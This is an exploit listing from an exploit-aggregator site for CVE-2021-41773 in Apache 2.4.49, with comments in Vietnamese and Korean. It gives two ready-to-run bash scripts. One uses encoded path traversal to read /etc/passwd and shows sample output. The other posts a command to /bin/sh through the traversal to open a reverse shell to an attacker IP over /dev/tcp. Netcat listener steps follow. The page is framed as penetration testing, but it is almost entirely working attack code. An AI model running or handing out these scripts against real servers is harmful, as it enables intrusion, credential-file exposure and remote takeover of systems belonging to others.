Sploitus

Exploit for CVE-2021-41773-Apache-2.4.49-

kitploit · 2026-08-26

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-KHAIDTRAIVCH-CVE-2021-41773-APACHE-2.4.49-
# CVE-2021-41773-Apache-2.4.49-

침투 테스트

1.1. Path Traversal (/etc/passwd 파일 읽기) #!/bin/bash

# Script: exploit_path_traversal.sh

# Mục tiêu: Đọc tệp /etc/passwd từ Apache 2.4.49

TARGET_IP="128.0.0.100" URL="http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"

echo "[+] Khai thác Path Traversal trên Apache 2.4.49..." curl -s "$URL" | head -n 5 # Hiển thị 5 dòng đầu của /etc/passwd

# Kết quả demo:

$ ./exploit_path_traversal.sh [+] Khai thác Path Traversal trên Apache 2.4.49... root❌0:0:root:/root:/bin/bash daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin bin❌2:2:bin:/bin:/usr/sbin/nologin sys❌3:3:sys:/dev:/usr/sbin/nologin sync❌4:65534:sync:/bin:/bin/sync

1.2. Remote Code Execution (Reverse Shell) #!/bin/bash

# Script: exploit_apache_rce.sh

# Mục tiêu: Thực thi lệnh reverse shell qua CGI

TARGET_IP="128.0.0.100" ATTACKER_IP="192.168.0.101" PORT="4444"

echo "[+] Gửi reverse shell đến $ATTACKER_IP:$PORT..." curl -X POST   
"http://$TARGET_IP/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"   
-H "Content-Type: application/x-www-form-urlencoded"   
-d "echo; bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/$PORT 0>&1'"

# 사용 방법:

# 1.Netcat을 열어 리스닝:

nc -lvnp 4444

# 2\. 스크립트 실행:

./exploit_apache_rce.sh